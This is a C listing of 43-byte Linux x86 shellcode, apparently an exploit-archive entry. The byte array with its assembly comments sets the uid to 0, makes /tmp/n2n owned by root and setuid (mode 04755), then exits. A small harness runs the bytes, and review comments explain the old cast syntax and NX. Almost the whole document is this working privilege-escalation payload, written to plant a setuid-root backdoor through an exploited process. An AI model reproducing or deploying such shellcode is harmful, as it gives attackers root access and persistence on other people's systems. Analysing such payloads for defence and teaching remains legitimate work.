43-byte Linux x86 shellcode that performs the following calls: setuid(0); chown("/tmp/n2n", 0, 0); chmod("/tmp/n2n", 04755); exit();
c9cfe186139032a40d3f9ddb38c191be71b284f24d4febdc1da027d250896d17
/*
43-byte linux x86 shellcode which does the following:
setuid(0);chown("/tmp/n2n",0,0);chmod("/tmp/n2n", 04755);exit();
by n2n, n2n@linuxmail.org,
Eye On Security Research Group - India, http://www.eos-india.net/
*/
#include <stdio.h>
char
shellcode[]=
/* setuid(0) */
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\xb0\x17" // mov $0x17,%al
"\xcd\x80" // int $0x80
/* chown("/tmp/n2n",0,0) */
"\x31\xd2" // xor %edx,%edx
"\x31\xc9" // xor %ecx,%ecx
"\x52" // push %edx
"\x68\x2f\x6e\x32\x6e" // push $0x6e326e2f
"\x68\x2f\x74\x6d\x70" // push $0x706d742f
"\x89\xe3" // mov %esp,%ebx
"\xb0\x10" // mov $0x10,%al
"\xcd\x80" // int $0x80
/* chmod("/tmp/n2n", 04755) */
"\x66\xb9\xed\x09" // mov $0x9ed,%cx
"\xb0\x0f" // mov $0xf,%al
"\xcd\x80" // int $0x80
/* exit() */
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80" // int $0x80
;
/*
 * Test harness: aims a function pointer at the shellcode array and calls it,
 * so the bytes execute inside this process with this process's privileges.
 * Run as root, that means the ownership and mode of /tmp/n2n on the host are
 * changed as described for the array.
 */
int
main()
{
/* Pointer to a function taking unspecified arguments and returning nothing. */
void (*funct) ();
/*
 * NOTE(review): a cast on the left-hand side of `=` is not standard C. It
 * relies on the old GCC "cast as lvalue" extension, which current compilers
 * reject, so this line dates the listing to an old toolchain.
 */
(long) funct = &shellcode;
/*
 * Jumps into the array, which lives in writable data. Where data pages are
 * mapped non-executable (NX / W^X), this call faults instead of running the bytes.
 */
funct();
/* No return statement: if the bytes run to completion, their exit syscall ends the process. */
}